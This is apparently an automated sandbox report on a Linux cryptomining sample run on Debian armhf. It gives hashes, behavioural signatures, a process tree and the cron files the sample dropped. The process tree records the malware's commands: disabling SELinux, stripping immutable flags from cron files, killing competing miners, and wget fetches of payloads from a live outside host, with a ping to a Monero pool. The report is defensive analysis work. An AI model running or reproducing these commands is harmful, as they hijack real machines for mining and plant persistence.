Analysis
-
max time kernel
40s -
max time network
38s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-03-2024 22:19
Static task
static1
Behavioral task
behavioral1
Sample
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
-
Size
11KB
-
MD5
1196d0a31402b04a32aa582ae6d2c15b
-
SHA1
5d6a8c0437bdf30079188283b0e60d063e649f27
-
SHA256
ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
-
SHA512
cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
-
SSDEEP
192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
dbuseddbusedioc pid process /tmp/dbused 913 dbused /tmp/dbused 915 dbused -
Attempts to change immutable files 4 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepchattrchattrgreppid process 794 grep 807 chattr 790 chattr 792 grep -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
grepdescription ioc process File opened for reading /proc/cpuinfo grep -
Creates/modifies Cron job 1 TTPs 6 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118description ioc File opened for modification /etc/cron.hourly/oanacroner1 File opened for modification /etc/cron.d/root 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118 File opened for modification /etc/cron.d/apache 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118 File opened for modification /etc/cron.d/nginx 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118 File opened for modification /var/spool/cron/root 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118 File opened for modification /var/spool/cron/crontabs/root 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118 -
Disables SELinux 7 IoCs
Disables SELinux security module.
Processes:
grepgrepgrepgrepsetenforcegrepgreppid process 753 grep 765 grep 771 grep 920 grep 667 setenforce 726 grep 733 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 17 IoCs
Processes:
killkillkillsysctlkillkillpskillkillkillkillkillkillkillkillkillpsdescription ioc process File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online sysctl File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspsxargsawkkillkillawksedmkdirawkkilldescription ioc process File opened for reading /proc/18/stat ps File opened for reading /proc/792/cmdline ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/684/stat ps File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/9/cmdline ps File opened for reading /proc/29/status ps File opened for reading /proc/661/cmdline ps File opened for reading /proc/111/stat ps File opened for reading /proc/794/cmdline ps File opened for reading /proc/filesystems kill File opened for reading /proc/26/stat ps File opened for reading /proc/26/stat ps File opened for reading /proc/filesystems kill File opened for reading /proc/3/stat ps File opened for reading /proc/41/status ps File opened for reading /proc/305/stat ps File opened for reading /proc/458/status ps File opened for reading /proc/794/stat ps File opened for reading /proc/self/maps awk File opened for reading /proc/sys/kernel/osrelease kill File opened for reading /proc/274/status ps File opened for reading /proc/uptime ps File opened for reading /proc/19/status ps File opened for reading /proc/666/cmdline ps File opened for reading /proc/43/cmdline ps File opened for reading /proc/406/cmdline ps File opened for reading /proc/406/status ps File opened for reading /proc/273/status ps File opened for reading /proc/278/status ps File opened for reading /proc/9/cmdline ps File opened for reading /proc/343/stat ps File opened for reading /proc/420/status ps File opened for reading /proc/684/cmdline ps File opened for reading /proc/filesystems sed File opened for reading /proc/11/cmdline ps File opened for reading /proc/152/cmdline ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/self/maps awk File opened for reading /proc/144/cmdline ps File opened for reading /proc/309/stat ps File opened for reading /proc/657/stat ps File opened for reading /proc/674/cmdline ps File opened for reading /proc/2/cmdline ps File opened for reading /proc/109/stat ps File opened for reading /proc/657/stat ps File opened for reading /proc/674/cmdline ps File opened for reading /proc/sys/kernel/osrelease kill File opened for reading /proc/457/cmdline ps File opened for reading /proc/664/cmdline ps File opened for reading /proc/5/cmdline ps File opened for reading /proc/8/status ps File opened for reading /proc/9/status ps File opened for reading /proc/16/stat ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/29/stat ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/29/cmdline ps File opened for reading /proc/13/stat ps File opened for reading /proc/28/status ps File opened for reading /proc/28/cmdline ps File opened for reading /proc/274/status ps -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc File opened for modification /tmp/dbused File opened for modification /tmp/bashirc
Processes
-
/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes1181⤵
- Creates/modifies Cron job
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
/bin/grepgrep -c processor /proc/cpuinfo2⤵
- Checks CPU configuration
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=3"2⤵
- Reads CPU attributes
-
/bin/grepgrep :33332⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/bin/grepgrep :44442⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :55552⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :77772⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/bin/grepgrep :144442⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :57902⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep :457002⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep :22222⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep :99992⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :205802⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
- Reads runtime system information
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :135312⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep 23.94.24.12:80802⤵
- Disables SELinux
-
/bin/sedsed -e "s/\\/.*//g"2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep 134.122.17.13:80802⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep 107.189.11.170:4432⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/usr/bin/chattrchattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
-
/bin/sleepsleep 12⤵
-
/usr/bin/chattrchattr -ai /tmp/dbused2⤵
- Attempts to change immutable files
-
/bin/mkdirmkdir -p /var/spool/cron/crontabs2⤵
-
/bin/mkdirmkdir -p /etc/cron.hourly2⤵
- Reads runtime system information
-
/bin/chmodchmod 755 /etc/cron.hourly/oanacroner12⤵
-
/bin/unameuname -m2⤵
-
/usr/bin/wgetwget -q -O - http://bash.givemexyz.in/armv7l2⤵
-
/bin/chmodchmod +x /tmp/dbused2⤵
-
/bin/chmodchmod +x /tmp/dbused2⤵
-
/tmp/dbused/tmp/dbused -c2⤵
- Executes dropped EXE
-
/tmp/dbused/tmp/dbused -pwn2⤵
- Executes dropped EXE
-
/bin/sleepsleep 52⤵
-
/bin/unameuname -m2⤵
-
/usr/bin/wgetwget -q -O - http://bash.givemexyz.in/bashirc.armv7l2⤵
-
/usr/bin/seqseq 0 2551⤵
-
/usr/bin/sortsort -R1⤵
-
/usr/bin/headhead -n11⤵
-
/usr/bin/seqseq 0 2551⤵
-
/usr/bin/sortsort -R1⤵
-
/usr/bin/headhead -n11⤵
-
/sbin/ipip a1⤵
-
/bin/grepgrep "BROADCAST\\|inet"1⤵
-
/bin/grepgrep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"1⤵
-
/bin/grepgrep -v 1271⤵
-
/bin/grepgrep -v inet61⤵
-
/bin/grepgrep -v 2551⤵
-
/usr/bin/headhead -n11⤵
-
/bin/pingping -c 1 pool.supportxmr.com1⤵
-
/bin/grepgrep "bytes of data"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/pingping -c 1 bash.givemexyz.in1⤵
-
/bin/grepgrep "bytes of data"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/grepgrep "212.114.52.24:8080\\|194.5.249.24:8080"1⤵
-
/bin/grepgrep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep "212.114.52.24:8080\\|194.5.249.24:8080"1⤵
-
/bin/grepgrep ESTABLISHED1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep 104.168.71.132:801⤵
- Disables SELinux
-
/bin/grepgrep ESTABLISHED1⤵
-
/bin/grepgrep -v grep1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/etc/cron.d/apacheFilesize
284B
MD59e9f6a486d0ea5976184c95a2f52cd49
SHA1e44fe455508309e8e21f9f33fffcc7eecca0de57
SHA2564d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337
SHA5121af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1
-
/etc/cron.d/nginxFilesize
284B
MD569f8fe8920f737d807cfda8f9d2ff2dd
SHA1df11f2d59edac589962a0178e50b6117d18a1933
SHA2565ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e
SHA512034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137
-
/etc/cron.d/rootFilesize
284B
MD5ddb2c00af645c486a790ed6d180b8819
SHA14ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340
SHA2568f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120
SHA5121f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4
-
/etc/cron.hourly/oanacroner1Filesize
264B
MD55cc2369275d33b8007781d1024edca44
SHA13e977f6e183c114affa947b2a2a70f7159ccddcc
SHA2564a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe
SHA51294ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49
-
/var/spool/cron/crontabs/rootFilesize
277B
MD5e3d993445d42ab3ed35d78335d8ae5a3
SHA1515765b31ed7b7098c12b7baae361fc86f6903ca
SHA2566a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd
SHA512006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f
-
/var/spool/cron/rootFilesize
280B
MD53abb4bc980da82bb669c1640539c5316
SHA1be90d689bd325d72f544ab87eed84871a0130f3d
SHA2566b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b
SHA512ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff
-
memory/763-1-0xb6c23000-0xb6c34044-memory.dmp